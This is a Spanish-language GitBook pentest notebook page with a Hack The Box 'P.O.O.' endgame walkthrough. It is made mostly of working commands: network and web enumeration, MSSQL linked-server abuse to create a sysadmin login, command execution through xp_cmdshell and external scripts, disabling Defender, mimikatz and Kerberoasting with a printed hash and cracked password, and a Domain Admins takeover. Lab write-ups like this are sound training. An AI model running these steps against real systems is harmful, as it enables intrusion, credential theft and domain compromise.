🌐
My Pentest Book
  • πŸ’‘I changed my website
  • πŸ“„WriteUps
    • πŸ΄β€β˜ οΈHTB - HackTheBox
      • ⬛HTB - Advanced Labs
        • Endgames
          • P.O.O.
      • 🟨HTB - Runner
      • 🟩HTB - Usage
      • 🟩HTP - Active (Incomplete)
      • 🟨HTB - Scrambled
      • πŸŸ₯HTB - FormulaX (Incomplete)
      • πŸŸ₯HTB - Office
      • 🟩HTB - Perfection
      • 🟨HTB - WifineticTwo
      • 🟨HTB - Jab (Incomplete)
      • 🟩HTB - Buff
      • 🟨HTB - Hospital
      • 🟩HTB - Crafty
      • 🟩HTB - Bizness
      • 🟩HTB - Devvortex
      • 🟩HTB - CozyHosting
      • 🟩HTB - Analytics
      • 🟩HTB - Codify
      • 🟨HTB - Surveillance
      • 🟨HTB - Monitored
Con tecnologΓ­a de GitBook
En esta pΓ‘gina
  • IntroducciΓ³n
  • Enumeration
  • NMAP Scans
  • Bruteforce Directories
  • DS Enumeration Directory
  • IIS Shortname Scanner
  • Path bruteforce with WFUZZ
  • MSSQL Enumeration / Linkcrawler
  • Installing USQL for client to MSSQL
  • MSSQL Enumeration
  • Adding Username to the DB
  • Check Username
  • XP_cmdshell
  • Enabling external scripts
  • Using external scripts (example)
  • Type web.config for extract administrator credentials.
  • Evil-WinRM
  • Mimikatz.exe
  • Invoke-Kerberoast.ps1
  • Sharphound
  • PowerView.ps1

ΒΏTe fue ΓΊtil?

Editar en GitHub
  1. WriteUps
  2. HTB - HackTheBox
  3. HTB - Advanced Labs
  4. Endgames

P.O.O.

https://app.hackthebox.com/endgames/poo

AnteriorEndgamesSiguienteHTB - Runner

Última actualización hace 1 año

ΒΏTe fue ΓΊtil?

IntroducciΓ³n

Professional Offensive Operations

By and

Professional Offensive Operations is a rising name in the cyber security world.

Lately they've been working into migrating core services and components to a state of the art cluster which offers cutting edge software and hardware.

P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment that is configured with the latest operating systems and technologies.

The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.

Entry Point: 10.13.38.11

Enumeration

ping -c 1 10.13.38.11 -R

NMAP Scans

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.13.38.11 -oG allPorts
nmap -p80,1433 -sCV 10.13.38.11 -oN targeted
# Nmap 7.94SVN scan initiated Fri Mar 29 18:18:25 2024 as: nmap -p80,1433 -sCV -oN targeted 10.13.38.11
Nmap scan report for 10.13.38.11
Host is up (0.26s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2024-03-29T22:18:45+00:00; +4s from scanner time.
| ms-sql-ntlm-info: 
|   10.13.38.11:1433: 
|     Target_Name: POO
|     NetBIOS_Domain_Name: POO
|     NetBIOS_Computer_Name: COMPATIBILITY
|     DNS_Domain_Name: intranet.poo
|     DNS_Computer_Name: COMPATIBILITY.intranet.poo
|     DNS_Tree_Name: intranet.poo
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-29T19:52:54
|_Not valid after:  2054-03-29T19:52:54
| ms-sql-info: 
|   10.13.38.11:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM+
|       number: 14.00.2027.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: true
|_    TCP port: 1433
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 18:18:41 2024 -- 1 IP address (1 host up) scanned in 16.08 seconds

Bruteforce Directories

dirsearch -u 10.13.38.11

DS Enumeration Directory

python ds_walk.py -u http://10.13.38.11
Output of ds_walk.py
[32m[!] .ds_store file is present on the webserver.0m
[32m[+] Enumerating directories based on .ds_server file:0m
----------------------------
[!] http://10.13.38.11/admin
[!] http://10.13.38.11/dev
[!] http://10.13.38.11/iisstart.htm
[!] http://10.13.38.11/Images
[!] http://10.13.38.11/JS
[!] http://10.13.38.11/META-INF
[!] http://10.13.38.11/New folder
[!] http://10.13.38.11/New folder (2)
[!] http://10.13.38.11/Plugins
[!] http://10.13.38.11/Templates
[!] http://10.13.38.11/Themes
[!] http://10.13.38.11/Uploads
[!] http://10.13.38.11/web.config
[!] http://10.13.38.11/Widgets
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11/Images/buttons
[!] http://10.13.38.11/Images/icons
[!] http://10.13.38.11/Images/iisstart.png
----------------------------
[!] http://10.13.38.11/JS/custom
----------------------------
[!] http://10.13.38.11/Themes/default
----------------------------
[!] http://10.13.38.11/Widgets/CalendarEvents
[!] http://10.13.38.11/Widgets/Framework
[!] http://10.13.38.11/Widgets/Menu
[!] http://10.13.38.11/Widgets/Notifications
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts/custom
[!] http://10.13.38.11/Widgets/Framework/Layouts/default
----------------------------
[32m[*] Finished traversing. No remaining .ds_store files present.0m
[32m[*] Cleaning up .ds_store files saved to disk.0m

IIS Shortname Scanner

python3 iis_shortname_scanner.py http://10.13.38.11/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
poo_co~1.txt
_co%%%%

Path bruteforce with WFUZZ

grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > co_fuzz.txt 
wc -l co_fuzz.txt
wfuzz -c -w co_fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404
curl 10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt

MSSQL Enumeration / Linkcrawler

msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
run
search mssql
use exploit/windows/mssql/mssql_linkcrawler
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11

Installing USQL for client to MSSQL

go install -tags most github.com/xo/usql@latest
usql 
\c mssql://external_user@10.13.38.11:1433
#p00Public3xt3rnalUs3r#

MSSQL Enumeration

SELECT name FROM sys.databases;
SELECT suser_name(); 
SELECT name,sysadmin FROM syslogins;
SELECT srvname, isremote FROM sysservers;
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select current_user');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select name,sysadmin from syslogins');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select srvname,isremote from sysservers');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'EXECUTE(''SELECT * FROM OPENQUERY([COMPATIBILITY\POO_PUBLIC], ''''SELECT SUSER_NAME();'''');'')');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",select * from openquery("COMPATIBILITY\POO_PUBLIC", ''select name from master.dbo.sysdatabases'')');

Adding Username to the DB

EXECUTE('EXECUTE(''EXEC master..sp_addlogin ''''3ky'''', ''''3ky123!'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''EXEC master..sp_addsrvrolemember ''''3ky'''',''''sysadmin'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";

Check Username

msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD 3ky123!
set USERNAME 3ky
set RHOST 10.13.38.11
run

XP_cmdshell

sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'whoami';
go

Enabling external scripts 

EXEC sp_configure 'external scripts enabled', 1
reconfigure
go

Using external scripts (example)

EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("whoami")'
go

Type web.config for extract administrator credentials.

EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("type C:\\inetpub\\wwwroot\\web.config")'
go
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("netstat -ano")'
go
echo "dead:beef::1001 compatibility.htb" | sudo tee -a /etc/hosts

Evil-WinRM

evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O."
net user administrator
Set-MpPreference -DisableRealtimeMonitoring $true

Mimikatz.exe

.\mimikatz.exe token::elevate lsadump::cache exit

Invoke-Kerberoast.ps1

sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'powershell -exec bypass -c "import-module C:\temp\invoke-kerberoast.ps1; invoke-kerberoast -outputformat haschat | f1"'
go
$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$A645B9CC69231DECE1D6EA7597FB0E47$83861CAE6474DF369FBC7DA10206403F8460129473B851720026FCD45D4FB62EDCD4A13024BF16DC09BF337F6EBA54FFF32308E523A1A9521211731C7108C712ABA91227A0051ABDEDD9CFA769A7AAAC8997163F0AF9DF29CF4E96276A044751340D8F26A3BE509A2FAC9E13B4EF851B8905180DD0C4B374A9133EC007DA9E54228613A91DCBA56879E42CAC146D0178BD936FB88C9271DB4338100E5DF1A81AF3F36D61C435984A5CF9B02FC8DB077F16C8921C22FAADF78B5B91447FD1B3DADA006663BD91FD0A5E5F3B33593F3C47AF2CE1C4A863C7DC3DCAE9F5EE8E0B980199DC7F6E9AC85E661BEADFAD7B219CBE0B60C822A61FFF2152E9E71FBE3E3E82E26C513AE664AC2C1312183D99136D70EF8FFC7DBA9CE8B49D941737BF18D511D11BCD004FA7EBB37469FCA6BFCCD6E281363DA5AEC48B0A92F34039812EDB042ADD4B9E22D89BC1402D3760D417E7C84022954B70FCE28B629BEA40A3F3EB88895A49B9039D3421E0BA17D5578927CC6E006C9859E9FF7BB1F7FAAFBC733FAAE18FB726B67D4EF1643B4B88F227A0B1794C0EA05D7996C565BA85DFDDFC0ED4E2D3FF66AB13763E91937B258FDCFCCA02FF53DF48B45086E89CEC99E898C2DD4A5E12DD53EBC9F4325A2F45A1EE895F6FDD2324AFC629243AFEFA098C714D863FE8C6A198DABF661563D106C767BAAEE3D27911EB701D49DCD702CA121E110125EE1DB0F759BF53E6E6DABBA7863638DC09A420C15638B830A869FB359DD1367FFBDA04EAD4711B2BDBA9B7B9D4AAEFB819A25CC358943A234CB262CB3B1FD69FC1D9724A01AC46B711917C6B1D9DDFA2F623FC7C0E1444522BF84C0FC5A1943DCC6D074EE151CB1B25C2A50F91A465086DAFEF44A7ABEC8463E8B3B33E922E1648458609220C2B79F2C264C5FEA08AF969F64A5C05E2D2570CCA9BB401263CCBE851FA15C554C2C021EFF2FB9A293ACF898F67296407CF2ADDEE36B8BAD716FB61C8800BAD049CE63A7AA31D8D7891D47028EC26E4900F883F6C9B7FDA430D1B1602F2D969F6BDBEEBEB5A0E40655B1DCE23CA43C2A3FCF2AB4B34D872D0BE0A58C17194FE3B1726031B7909A37D2C470CF61AAF204E1942E2E1B78D11F3921B4F03CFD68F23BB702ADF84EF2D99F75D91CBD5183E450BDE04236BAB0C66F42AD7141B1AFB7963E56B37668AE24ADA1B378C8D9993AE5723C0B0FC11A8372EB738D18988D90C736D1A4B3979CE16C344FD3B33B957756F5C5C03AD3978DC912A048A9EBCA6A244CE84AEA74D57066DA235CCA373571DCE88A0B8D21A4053C9ABC075C4208164E10D9762A9F06193BA833261F245D525A38FF590DFBA50D9FD29B6997D094D9C592D2F92AA3BEC0441126EBBFCE6105FDDD5135654820F6221C2CE12B6AFE5E4B403E488616313874FBEB4452037BA63964051DAE064F9503E9740B4C5E51F24CE795B8FF078ECC6D0E1E642A383C8AAFCBAD5A822
hashcat -a0 -m 13100 hash.txt /usr/share/wordlists/seclists/Passwords/Keyboard-Combinations.txt
ZQ!5t4r

Sharphound

sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'cd C:\temp && SharpHound.exe -c all'
go

PowerView.ps1

evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O." -s .
$user = 'intranet.poo\p00_adm'
$pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force -AsPlainText
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
Add-DomainGroupMember -Identity "Domain Admins" -Members "p00_adm" -Credential $cred


$pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force -AsPlainText
$cred = New-Object -TypeName System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $Cred
πŸ“„
πŸ΄β€β˜ οΈ
⬛
Page cover image
eks
mrb3n
LogoGitHub - BloodHoundAD/SharpHoundGitHub
LogoPowerTools/powerview.ps1 at master Β· PowerShellEmpire/PowerToolsGitHub
LogoEmpire/Invoke-Kerberoast.ps1 at master Β· EmpireProject/EmpireGitHub
LogoGitHub - Keramas/DS_Walk: Python tool for enumerating directories and files on web servers that contain a publicly readable .ds_store file.GitHub
DS_Walk Repository
Logomimikatz/mimikatz.exe at master Β· ParrotSec/mimikatzGitHub
LogoGitHub - lijiejie/IIS_shortname_Scanner: an IIS shortname ScannerGitHub